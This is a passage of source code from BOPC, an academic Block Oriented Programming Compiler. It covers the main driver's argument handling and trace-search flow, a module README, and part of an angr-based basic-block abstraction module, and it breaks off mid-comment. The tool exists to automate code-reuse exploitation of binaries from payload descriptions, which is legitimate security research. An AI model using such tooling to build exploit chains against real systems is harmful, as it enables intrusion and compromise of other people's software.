        required = False
    )

    group_s.add_argument(
        '-f', "--format",
        help     = "The format of the solution (Default: raw)",
        choices  = ['raw', 'idc', 'gdb'],
        action   = 'store',
        default  = 'raw',
        dest     = 'format',
        required = False,
    )

    group_s.add_argument(
        "--find-all",
        help     = "Find all the solutions",
        action   = 'store_const',
        default  = 'one',
        const    = 'all',
        dest     = 'findall',
        required = False
    )


    # -------------------------------------------------------------------------
    # Group for debugging arguments
    # -------------------------------------------------------------------------
    group_d.add_argument(
        "--mapping-id",
        help     = "Run the Trace Searching algorithm on a given mapping ID",
        metavar  = 'ID',
        action   = 'store',
        default  = -1,
        dest     = 'mapping_id',
        required = False
    )

    group_d.add_argument(
        "--mapping",
        help     = "Run the Trace Searching algorithm on a given register mapping",
        metavar  = 'MAP',
        nargs    = '+',
        action   = 'store',
        default  = [],
        dest     = 'mapping',
        required = False
    )

    group_d.add_argument(
        "--enum-mappings",
        help     = "Enumerate all possible mappings and exit",
        action   = 'store_const',
        default  = False,
        const    = True,
        dest     = 'enum_mappings',
        required = False
    )

    group_d.add_argument(
        "--abstract-blk",
        help     = "Abstract a specific basic block and exit",
        metavar  = 'BLKADDR',
        action   = 'store',
        dest     = 'absblk',
        required = False
    )


    # -------------------------------------------------------------------------
    # Group for application capabilities
    # -------------------------------------------------------------------------
    group_c.add_argument(
        '-c', "--capability",
        help     = textwrap.dedent('''\
                    Measure application's capability. Options (can be many)

                    all\tSearch for all Statements
                    regset\tSearch for Register Assignments
                    regmod\tSearch for Register Modifications
                    memrd\tSearch for Memory Reads
                    memwr\tSearch for Memory Writes
                    call\tSearch for Function/System Calls
                    cond\tSearch for Conditional Jumps
                    load\tLoad capabilities from file
                    save\tSave capabilities to file
                    noedge\tDump statements and exit (don't calculate edges)'''),
        choices  = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond',
                    'save', 'load', 'noedge'],
        metavar  = 'OPTIONS',
        nargs    = '+',                             # consume >=1 arguments (multiple options)
        action   = 'store',
        dest     = 'capabilities',
        required = False
    )


    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    return parser.parse_args()                      # do the parsing (+ error handling)



# ---------------------------------------------------------------------------------------------
# load(): Load the target binary and generate its CFG.
#
# :Arg filename: Binary's file name
# :Ret: Function returns
#
def load( filename ):
    # load the binary (exception is thrown if name is invalid)
    project = angr.Project(filename, load_options={'auto_load_libs': False})



    # generate CFG
    dbg_prnt(DBG_LVL_0, "Generating CFG. It might take a while...")
    CFG = project.analyses.CFGFast()
    dbg_prnt(DBG_LVL_0, "CFG generated.")


    # normalize CFG (i.e. make sure that there are no overlapping basic blocks)
    dbg_prnt(DBG_LVL_0, "Normalizing CFG...")
    CFG.normalize()

    # normalize every function object as well
    for _, func in project.kb.functions.iteritems():
        if not func.normalized:
            dbg_prnt(DBG_LVL_4, "Normalizing function '%s' ..." % func.name)
            func.normalize()

    dbg_prnt(DBG_LVL_0, "Done.")


    emph("CFG has %s nodes and %s edges" %
                (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges()))))


    # create a quick mapping between addresses and nodes (basic blocks)
    for node in CFG.graph.nodes():
        ADDR2NODE[ node.addr ] = node


    # create a quick mapping between basic block addresses and their corresponding functions
    for _, func in CFG.functions.iteritems():       # for each function
        for addr in func.block_addrs:               # for each basic block in that function
            ADDR2FUNC[ addr ] = func


    return project, CFG



# ---------------------------------------------------------------------------------------------
# abstract(): Abstract the CFG and apply any further abstraction-related operations.
#
# :Arg mark: A valid graph marking object.
# :Arg mode: Abstraction mode (load, save, saveonly, none)
# :Arg filename: Abstraction's file name (if applicable)
# :Ret: None.
#
def abstract( mark, mode, filename ):
    if mode == 'none':
        mark.abstract_cfg()                         # calculate the abstractions

    if mode == 'load':
        mark.load_abstractions(filename)            # simply load the abstractions

    elif mode == 'save':
        mark.abstract_cfg()                         # calculate the abstractions
        mark.save_abstractions(filename)            # and save them

    elif mode == 'saveonly':
        mark.abstract_cfg()
        mark.save_abstractions(filename)
        return -1

    return 0



# ---------------------------------------------------------------------------------------------
# capability_analyses(): Apply any (custom) analyses to the capabilities.
#
# :Arg cap: The capability object
# :Ret: None.
#
def capability_analyses( cap ):
    dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...')
    return

    '''
    # analyze all islands
    # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST)

    # analyze a specific island
    # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR)

    i = 0
    def foo( graph ):
        global i
        print 'Visualing island %d' % i
        cap.visualize(graph, 'island_%d' % i, show_labels=True)

        i += 1

        for _, d in graph.nodes_iter(data=True):
            print d['type'] # check capability.__add() for all keys


    # apply the callback to every island
    cap.callback( foo )
    '''


# -------------------------------------------------------------------------------------------------
# main(): This is the main function of BOPC.
#
# Ret: None.
#
if __name__ == '__main__':
    args = parse_args()                         # process arguments
    set_dbg_lvl( args.dbg_lvl )                 # set debug level in coreutils

    now  = datetime.datetime.now()              # get current time


    # -------------------------------------------------------------------------
    # Display banner
    # -------------------------------------------------------------------------
    print rainbow(textwrap.dedent('''
        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
        %                                                                    %
        %                :::::::::   ::::::::  :::::::::   ::::::::          %
        %               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %
        %              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %
        %             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %
        %            +#+    +#+ +#+    +#+ +#+        +#+                    %
        %           #+#    #+# #+#    #+# #+#        #+#    #+#              %
        %          #########   ########  ###         ########                %
        %                                                                    %
        %                Block Oriented Programming Compiler                 %
        %                                                                    %
        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
        '''))

    print comments
    print "[*] Starting BOPC %s at %s" % (VERSION, bolds(now.strftime("%d/%m/%Y %H:%M")))


    # -------------------------------------------------------------------------
    # BOPC operation: Emit SPL IR
    # -------------------------------------------------------------------------
    if args.emit_IR and args.source:
        IR = C.compile(args.source)
        IR.compile()                                # compile the SPL payload

        IR = O.optimize(IR.get_ir())
        IR.optimize(mode=args.optimizer)           # optimize IR (if needed)

        IR.emit(args.source)


    # -------------------------------------------------------------------------
    # BOPC operation: Trace Search
    # -------------------------------------------------------------------------
    elif args.source and args.entry:
        IR = C.compile(args.source)
        IR.compile()                                # compile the SPL payload

        IR = O.optimize(IR.get_ir())
        IR.optimize(mode=args.optimizer)            # optimize IR (if needed)


        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, IR, 'puts')

        if abstract(mark, args.abstractions, args.binary) > -1:
            entry = int(args.entry, 0)              # get entry point

            X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping)))

            if not X:
                print 'abort';
                exit()


        #   visualize('cfg_cand', entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE)

            # extract payload name (without the extenstion)
            payload_name = ntpath.basename(args.source)
            payload_name = os.path.splitext(payload_name)[0]


            try:
                options = {
                    'format'     : args.format,
                    'solutions'  : args.findall,
                    'mapping-id' : int(args.mapping_id),
                    'mapping'    : sorted(map(lambda s : tuple(s.split('=')), args.mapping)),
                    'filename'   : '%s-%s' % (args.binary, payload_name),
                    'enum'       : args.enum_mappings,

                    'simulate'   : False,
                    '#mappings'  : 0,
                    '#solutions' : 0
                }

            except ValueError:
                fatal("'mapping' argument must be an integer")


            tsearch = S.search(project, CFG, IR, entry, options)
            tsearch.trace_searching(mark)

            # -----------------------------------------------------------------
            # Show some statistics
            # -----------------------------------------------------------------
            emph("Trace Searching Statistics:" )
            emph("\tUsed Simulation? %s"  % bolds(options['simulate']))
            emph("\t%s Mapping(s) tried"  % bold(options['#mappings']))
            emph("\t%s Solution(s) found" % bold(options['#solutions']))


    # -------------------------------------------------------------------------
    # BOPC operation: Dump abstractions
    # -------------------------------------------------------------------------
    elif args.abstractions == 'saveonly':
        # IR is useless; we're only dumping abstractions
        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, None, 'puts')

        abstract(mark, args.abstractions, args.binary)


    # -------------------------------------------------------------------------
    # BOPC operation: Application Capability
    # -------------------------------------------------------------------------
    elif args.capabilities:
         # IR is useless; we're measuring capability
        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, None, 'puts')

        abstract(mark, args.abstractions, args.binary)

        # cfg is loaded with abstractions
        cap = P.capability(CFG, args.binary)

        options = 0

        for stmt in args.capabilities:
            options = options | {
                'all'    : P.CAP_ALL,
                'regset' : P.CAP_REGSET,
                'regmod' : P.CAP_REGMOD,
                'memrd'  : P.CAP_MEMRD,
                'memwr'  : P.CAP_MEMWR,
                'call'   : P.CAP_CALL,
                'cond'   : P.CAP_COND,
                'load'   : P.CAP_LOAD,
                'save'   : P.CAP_SAVE,
                'noedge' : P.CAP_NO_EDGE
            }[stmt]     # argparse ensures no KeyError

        cap.build(options=options)                  # build the Capability Graph
        cap.save()                                  # save nodes to a file
        cap.explore()                               # explore Islands

        capability_analyses( cap )


    # -------------------------------------------------------------------------
    # BOPC operation: Single block abstraction
    # -------------------------------------------------------------------------
    elif args.binary and args.absblk:
        project = angr.Project(args.binary, load_options={'auto_load_libs': False})

        load(args.binary)

        abstr   = A.abstract_ng(project, int(args.absblk, 0))

        dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0))
        for a, b in abstr:
            if a == 'regwr':
                dbg_prnt(DBG_LVL_0, '%14s :' % a)
                for c, d in b.iteritems():
                    dbg_prnt(DBG_LVL_0, '\t\t%s = %s' % (c, str(d)))

            else:
                dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b)))


    # -------------------------------------------------------------------------
    # invalid BOPC operation
    # -------------------------------------------------------------------------
    else:
        fatal('Invalid configuration argument')


    emph('')
    emph('BOPC has finished.', DBG_LVL_0)
    emph('Have a nice day!',        DBG_LVL_0)
    emph('Bye bye :)',              DBG_LVL_0)

    warn('A segmentation fault may occur now, due to an internal angr issue')



# ---------------------------------------------------------------------------------------


================================================
FILE: source/README.md
================================================


# Block Oriented Programming Compiler (BOPC)


___

### BOPC Implementation Overview

![alt text](./images/BOPC_overview.png)


### Source Code Overview


| File                             | Description                                 |
| ---------------------------------|---------------------------------------------|
| [BOPC.py](./BOPC.py)             | Main file |
| [absblk.py](./absblk.py)         | Basic block abstraction |
| [calls.py](./calls.py)           | Supported library and system calls |
| [capability.py](./capability.py) | Application Capability |
| [compile.py](./compile.py)       | SPL compiler |
| [config.py](./config.py)         | Configuration file |
| [coreutils.py](./coreutils.py)   | Shared utils across modules |
| [delta.py](./delta.py)           | Delta graph |
| [map.py](./map.py)               | Mapping across registers and variables |
| [mark.py](./mark.py)             | Marking and re-Marking CFG |
| [optimize.py](./optimize.py)     | SPL optimizer |
| [output.py](./output.py)         | Write solutions to a file |
| [path.py](./path.py)             | CFG shortest paths |
| [search.py](./search.py)         | Trace Searching algorithm |
| [simulate.py](./simulate.py)     | Concolic execution |


___

================================================
FILE: source/absblk.py
================================================
#!/#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# absblk.py:
#
# This module implements the basic block "abstractions". Abstraction is a process that summarizes
# a basic block into the "impact" on program's state.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import signal
import simuvex
import claripy
import archinfo
import angr



# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
_STACK_SZ = 0x1000                                  # size of symbolic stack



# -------------------------------------------------------------------------------------------------
# abstract_ng: This class implements the next generation of the basic block "abstraction". So
#   far, the following abstractions are supported:
#  
#   * * Register Writes * *
#   A dictionary that contains all registers that are being written. The "write" information is
#   another dictionary with the following fields:
#
#       * type     : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob'
#                    when, it does not fall to any of the other types
#       * const    : ('concrete' and 'mod' types). The constant value that is written to the
#                    register
#       * writable : ('concrete' types). If the constant value is a valid and writable memory
#                    address, then this field is set to True
#       * op       : ('mod' types). The modification operator
#       * addr     : ('deref' types). The address that register value is loaded from
#       * deps     : ('deref' types). Any registers that participate in addr field
#       * sym      : ('deref' types). A mapping between registers and their symbolic variables
#       * memrd    : ('deref' types). When the register write can be used as a memory read, this
#                    field contains the size of the memory read in bytes (1,2,4,8). Otherwise it
#                    is set to None
#
#   Example:
#       regwr = {
#           rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True },
#           rcx : {'type': 'deref', 'addr': <BV64 rsi_43_64 + 0x10>, 'deps': ['rsi']},
#           r9  : {'type': 'mod', 'op': '+', 'const': 1337L}
#       }
#
#
#   * * Memory Reads * *
#   A list of tuples (address, size) for every memory read.
#
#   Example:
#       memrd = set([(<SAO <BV64 0x7ffffffffff0810>>, 64), (<SAO <BV64 0x7ffffffffff0818>>, 64)])
#
#
#   * * Memory Writes * *
#   A list of tuples (address, data) for every memory write (len(data) indicates the size)
#
#   Example:
#       memwr = set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 rbx_1_64>>), 
#                    (<SAO <BV64 0x7ffffffffff07e0>>, <SAO <BV64 0x416631>>)])
#
#
#   * * Concrete Writes * *
#   A list of tuples (address, size) for every concrete memory write.
#
#   Example:
#       conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)])
#
#
#   * * SPL Memory Writes * *
#   A list of dictionaries for every SPL memory write (memory writes that are in the form:
#   "mov [rax], rbx"). Each dictionary contains the following fields:
#
#       * mem  : The register that holds the address to write (string)
#       * val  : The register that holds the value to be written (string)
#       * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx)
#       * sym  : A mapping between registers and their symbolic variables
#
#   Example:
#       splmemwr = [{
#            'mem'  : 'rbx', 
#            'val'  : 'rax', 
#            'size' : 4,
#            'sym'  : {'rax': <BV64 rax_0_64>, 'rbx': <BV64 rbx_1_64>}
#       }]
#
#
#   * * Calls * *
#   A dictionary with the following fields:
#
#       * type : Can be 'syscall', or 'libcall'
#       * name : The name of the call
#
#   Example:
#       call = {'type': 'libcall', 'name': u'puts'}
#
#
#   * * Conditional Jumps * *
#   A dictionary with the following fields:
#
#       * form      : The form of the conditional jump ('simple' / 'extended')
#       * reg       : The register that participates in the conditional jump
#       * const     : The constant value that register is compared against
#       * op        : The comparison operator
#       * mod_op    : ('extended' types). The operator of the register modification
#       * mod_const : ('extended' types). The constant of the register modification
#
#   Example:
#       cond = {'reg': 'r11', 'op': '==', 'const': 11L}
#       cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='}
#
#
#   * * Symbolic Variables * *
#   A dictionary that maps the symbolic variables to their actual addresses that they correspond
#
#   Example:
#       symvar = {<BV64 mem_7fffffffffef1e8_82_64>' : 0x7fffffffffef1e8}
#
#
# * * * ---===== TODO list =====--- *
#
#   [1]. Make absblk more precise i.e., check the order of memory writes
#   [2]. Move this list at the beginning of the file.
#
class abstract_ng( object ):
    ''' ======================================================================================= '''
    '''                                   AUXILIARY FUNCTIONS                                   '''
    ''' ======================================================================================= '''
 
    # ---------------------------------------------------------------------------------------------
    # __reg_w(): Analyze the register writes of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __reg_w( self, state ): 
        visited = set()                             # visited registers

        for action in reversed(state.actions):      # for every action (start backwards)    
            if not (action.type == 'reg' and action.action == 'write'):
                continue                            # we care about register writes only                        

            try:
                # we only care about the most recent register write only            
                reg = self.__proj.arch.register_names[action.offset]
            except KeyError:
                continue

            # get the last write only
            if reg not in HARDWARE_REGISTERS or reg in visited:
                continue

            data = { }                              # various data related to the write
            visited.add(reg)                        # make sure that you won't visit this again


            # ---------------------------------------------------------------------------
            # If some address (initialized or not) is used as a dereference, the regwr
            # entry for that register must be preserved (we should not overwrite register
            # with the actual value in that address)
            # ---------------------------------------------------------------------------
            if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref':
                continue

            # The register is being modified, so we start by marking it as clobbering
            if reg not in self.regwr:
                self.regwr[ reg ] = {'type' : 'clob'}

            
            # -----------------------------------------------------------------
            if action.data.concrete:                # if register gets a concrete value,
                value = state.se.eval(action.data)  # concretize it

                data['type']     = 'concrete'       # set data
                data['const']    = value
                data['writable'] = True             # initialize this first
                in_section = False

                # now, check whether this value is a writable address                
                try:                    
                    # The problem: There are some weird sections (.e.g., ".comment") whose VA
                    # starts from 0. Therefore, we may have register writes with constants like
                    # 1, 2 and so on, which are marked as +W. This means that at the end we can 
                    # have memory reservations (writes) at those addresses. Our old approach with 
                    # "state.memory.permissions(value)" doesn't work here.
                    #
                    # So iterate over ELF sections looking for it
                    for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():                        
                        # it's possible for the value to be part of >1 sections (usually when
                        # section's VA is 0; sec.vaddr != 0). We mark value as +W only when *all*
                        # sections are writable
                        if sec.contains_addr(value):
                            data['writable'] &= sec.is_writable
                            in_section = True


                    # if can't find section (b/c it's generated at runtime, like .stack)
                    if not in_section:
                        # TODO: check if value+1, value+2, etc. are writable as well
                        rwx = state.memory.permissions(value)

                        if state.se.eval(rwx) & 2 == 2: # is +W (2nd bit) set?
                            data['writable'] = True
                        else:
                            data['writable'] = False
                        
                except Exception, e:                # page does not exist at given address
                    data['writable'] = False        # not writable at all

                    try:
                        # special case when a stack address is in the next page (-W)
                        if value & 0x07ffffffffff0000 == 0x07ffffffffff0000:
                            rwx = state.memory.permissions(value-0x4000)

                            # give it a second change
                            if state.se.eval(rwx) & 2 == 2:
                                data['writable'] = True

                    except Exception, e:            # or angr.errors.SimMemoryError
                        pass

            # -----------------------------------------------------------------
            else:                                   # register doesn't get a concrete value

                # register gets an expression. Check for simple register modifications: 
                # "<reg> <op>= <const>" (we can easily scale this to <reg> <op>= <reg>)
                # Note that modified register should be the same with action.offset
                node = [leaf for leaf in action.data.recursive_leaf_asts]
                    
                # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register)
                if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2:
                    try:
                        data['op'] = {              # cast operator
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }[ action.data.op ]
                    
                        # if constant is on the left, swap sides
                        if node[0].op == 'BVV' and node[0].concrete:
                            node[0], node[1] = node[1], node[0]


                        # check if we're in the form: <reg> <op> <const> 
                        if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \
                           node[1].op == 'BVV' and node[1].concrete:
                                data['type']  = 'mod'
                                data['const'] = state.se.eval(node[1])
                        else:                       # not in the right form
                                continue

                    except KeyError:                # __symreg() threw an exception
                        continue

        
                # -----------------------------------------------------------------------
                # Consider the following case:
                #       .text:000000000040BA49         mov     eax, [rbp+tfd]
                #       .text:000000000040BA52         mov     edi, eax         ; fd
                #
                # Here, edi gets exactly the same value with eax, but edi is marked as
                # 'clob', while eax as 'deref'. The root cause is that edi does not
                # participate in any memory reads and the assigned value is not constant
                # (i.e., it doesn't come directly from a register).
                #
                # To fix that we check whether a 'clob' register has *exactly* the same 
                # symbolic value with another one (eax in our example), and if so we 
                # assign the same regwr entry to it.
                # -----------------------------------------------------------------------
                else:
                    # iterate over previous writes
                    for reg2, val in self.__reg_rawval.iteritems():
                        try:

                            # check if raw values match
                            if reg != reg2 and val.shallow_repr() == action.data.shallow_repr():

                                self.regwr[ reg ] = self.regwr[ reg2 ]
                                pass

                        except KeyError:
                            pass


            # -----------------------------------------------------------------
            if data:
                self.regwr[ reg ] = data            # set data to this register
        


    # ---------------------------------------------------------------------------------------------
    # __mem_r(): Analyze the memory reads of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_r( self, state ):
        for action in state.actions:                # for every action        
            if not (action.type == 'mem' and action.action == 'read'):
                continue                            # we care about memory reads only

            # simply add address (can be an expression) and size to the list
            self.memrd.add( (action.addr, len(action.data)) )



    # ---------------------------------------------------------------------------------------------
    # __mem_w(): Analyze the memory writes of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_w( self, state ):
        for action in state.actions:                # for every action        
            if not (action.type == 'mem' and action.action == 'write'):
                continue                            # we care about memory writes only

            # simply add address (can be an expression) and data to the list
            self.memwr.add( (action.addr, action.data) ) 
            
            if action.addr.concrete:                # if address is concrete
                # concretize it as well
                self.conwr.add( (state.se.eval(action.addr), len(action.data)) )


            deps   = [ ]
            symtab = { }

            # -----------------------------------------------------------------
            # Check for memory register writes (mov [rax], rbx)
            #
            # In this case, both action.addr and action.data will consist of a
            # single leaf in their ast which is a register
            # -----------------------------------------------------------------
            mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts]
            val_reg = [leaf for leaf in action.data.recursive_leaf_asts]


            # print 'ADDR', mem_reg, action.addr
            # print 'ADDR', val_reg, action.addr
                 
            # check AST have a single leaf
            if len(mem_reg) == 1 and len(val_reg) == 1:
                mem, val = None, None

                # check whether the leaf is a register
                for sym, nam in self.__symreg.iteritems():
                    # skip registers that are not symbolic (e.g., rbp)
                    if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr():                        
                        symtab[nam] = sym
                        mem         = nam

                    elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr():                        
                        symtab[nam] = sym
                        val         = nam

                # if both leaves are registers we have a memory register write!
                if mem and val:                
                    self.splmemwr.append({
                        'mem'  : mem,
                        'val'  : val,
                        'size' : int(action.size) >> 3,
                        'sym'  : symtab,                      
                    })



    # ---------------------------------------------------------------------------------------------
    # __call(): Analyze the (sys|lib)calls of the symbolic execution. Because we're analyzing a
    #       single basic block, we can have up to one such (sys|lib)call (the last instruction).
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __call( self, state ):
        blk = self.__proj.factory.block(self.__entry)

        # check if symbolic execution stopped on a syscall
        # (don't use "if self.__proj._simos.is_syscall_addr(state.addr)"; it throws exceptions)
        if blk.vex.jumpkind == "Ijk_Sys_syscall":
            # a system call was invoked
            # we assume that simproc.cc == SimCCAMD64LinuxSyscall                
            simproc = self.__proj._simos.syscall(state)

            self.call['type'] = 'syscall'
            self.call['name'] = simproc.display_name
            # self.call['nargs'] = simproc.num_args

        else:  
            if blk.vex.jumpkind != "Ijk_Call":      # skip block when it doesn't end with a call
                return


            # check if symbolic execution stopped on a library call
            for action in reversed(state.actions):  # for every action        
                if action.type != 'exit':
                    continue                        # we care about branches only


                # concretize function's entry point
                target = state.se.eval(action.target)

                # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast())
                try:
                    self.call['type'] = 'libcall'
                    self.call['name'] = self.__proj.kb.functions[target].name
                except Exception:                   # no function name at that address
                    self.call = { }



    # ---------------------------------------------------------------------------------------------
    # __cond(): Analyze the conditional jump of the symbolic execution. Because we're analyzing a
    #       single basic block, we can have up to one conditional jump.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __cond( self, state ):        
        for action in reversed(state.actions):      # for every action        
            if not (action.type == 'exit' and action.exit_type == 'conditional'):
                continue                            # we care about conditional jumps only
          

            # as in __reg_w(), we only care about simple conditional jumps: "<reg> <op> <const>"
            if len(action.condition.variables) == 1:  
                try:
                    self.cond['op'] = {             # cast operator
                        '__eq__' : '==',
                        '__ne__' : '!=',
                        '__le__' : '<=',
                        '__lt__' : '<',
                        '__ge__' : '>=',
                        '__gt__' : '>',

                        'SGT'    : '>',                        
                        'SGE'    : '>=',
                        'SLT'    : '<',
                        'SLE'    : '<=',                        
                        'UGT'    : '>',             # do not distinguish signed/unsigned operators
                        'UGE'    : '>=',
                        'ULT'    : '<',
                        'ULE'    : '<=',
                    }[ action.condition.op ]
                except KeyError: 
                    warn('Unknown conditional jump operator "%s"' % action.condition.op)
                    self.cond = { }
                    return

                
                node = [leaf for leaf in action.condition.recursive_leaf_asts]


                # -----------------------------------------------------------------------
                # Check if we're in the simple form: <reg> <op> <const>
                # -----------------------------------------------------------------------
                if len(node) == 2:                  # we need 2 leaves + 1 operator
                    self.cond['form'] = 'simple'    # we're in the simple form

                    try:
                        # swap register and constant if needed
                        if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete:
                            node[0], node[1] = node[1], node[0]


                        # if we're in the right form (reg and const), we have our condition
                        if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete:
                            self.cond['reg']   = self.__symreg[node[0]]
                            self.cond['const'] = state.se.eval(node[1])
                        else:
                            self.cond = { }         # not in the right form
                            return

                    except KeyError:                    
                        # if not in the right form, __symreg() will throw a KeyError exception
                        self.cond = { }
                        return


                # -----------------------------------------------------------------------
                # Check if we're in the extended form: (<reg> <op> <const>) <op> <const>
                # (example: "<SAO <Bool (rbx_1_64 + 0x1) == 0x8>>")
                # 
                # This is when the iterator (register) gets modified and compared at the
                # same basic block.
                # -----------------------------------------------------------------------
                elif len(node) == 3:                # we need 3 leaves and 2 operators
                    self.cond['form'] = 'extended'  # we're in the extended form

                    try:
                        # get left and right side of the comparison
                        left, right = action.condition.split( action.condition.op )

                        # if the constant is on the left side, swap sides
                        if left.op == 'BVV' and left.concrete:
                            left, right = right, left


                        mod_ops = {                 # register modification operations
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }

                        
                        # if the left side is a modification and the right side a constant
                        if left.op in mod_ops and right.op == 'BVV' and right.concrete:
                            self.cond['const']  = state.se.eval(right)
                            self.cond['mod_op'] = mod_ops[ left.op ]

                            reg, const = left.split( left.op )

                            # if the constant is on the left side, swap sides
                            if reg.op == 'BVV' and reg.concrete:
                                reg, const = const, reg

                            # if the modification uses a constant and a register
                            if reg.op   == 'BVS' and reg in self.__symreg and \
                               const.op == 'BVV' and const.concrete:
                                    self.cond['reg']       = self.__symreg[reg]
                                    self.cond['mod_const'] = state.se.eval(const)
                            else:
                                self.cond = { }     # something is not in the right form
                                return    
                        else:
                            self.cond = { }
                            return    
                                    
                    except ValueError:              # != 2 values to split()
                        self.cond = { }
                        return


                # -----------------------------------------------------------------------
                # Otherwise we're not in the right form
                # -----------------------------------------------------------------------
                else:
                    self.cond = { }
                    continue


                # The problem here, is that simgr sometimes "inverts" the condition, so the 
                # "target" basic block is the block immediately after the current block. To 
                # be consistent, we have to "invert" the operator, so the target basic block
                # is executed when the jump is taken.
                blk = self.__proj.factory.block(self.__entry) 

                # check if the target is the next block (assume action.target is concrete)
                if state.se.eval(action.target) == blk.addr + blk.size:
                    self.cond['op'] = {                 # invert the condition
                        '==' : '!=',
                        '!=' : '==',
                        '>'  : '<=',
                        '>=' : '<',
                        '<'  : '>=',
                        '<=' : '>'
                    }[ self.cond['op'] ]  

            break                                   # there's up to 1 conditional jump



    # ---------------------------------------------------------------------------------------------
    # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression.
    #       For instance, given the expression: <BV64 mem_7fffffffffef1e8_82_64 + 0x68>, we want to
    #       map the variable 'mem_7fffffffffef1e8_82_64' to its actual address: 0x7fffffffffef1e8.
    #
    # :Arg addr_expr: The address expression to get variables from
    # :Ret: None.
    #
    def __add_sym_vars( self, addr_expr ):
        # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf
        # will be like this: "<BV64 mem_7ffffffffff13e8_4928_64{UNINITIALIZED}>"
        #
        # We want to extract the ADDRESS and SIZE fields
        for leaf in addr_expr.recursive_leaf_asts:  # for each leaf in the AST
            leafstr = leaf.shallow_repr()           # cast it to sting

            # if leaf is a memory variable, extract its address and its size
            if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr):
                _, addr, rand, size = leafstr.split('_')

                # size might be followed by the "{UNINITIALIZED}" keyword, so it must be dropped
                # if not the ">" must also be dropped
                size = size.replace("{UNINITIALIZED}>", "").replace(">", "")

                # add the symbolic variable to the map
                self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3)



    # ---------------------------------------------------------------------------------------------
    # __memread_callback(): This function is invoked every time that a memory read operation is 
    #       performed.
    #
    # :Arg state: Current state to read memory from
    # :Ret: None.
    #
    def __memread_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return
        
        self.__callback_mutex = 1                   # get lock

        # ---------------------------------------------------------------------
        # If address is part of the .bss/.data, it will be initialized with a
        # default value of 0. However, it can get any value (due to AWP) so it
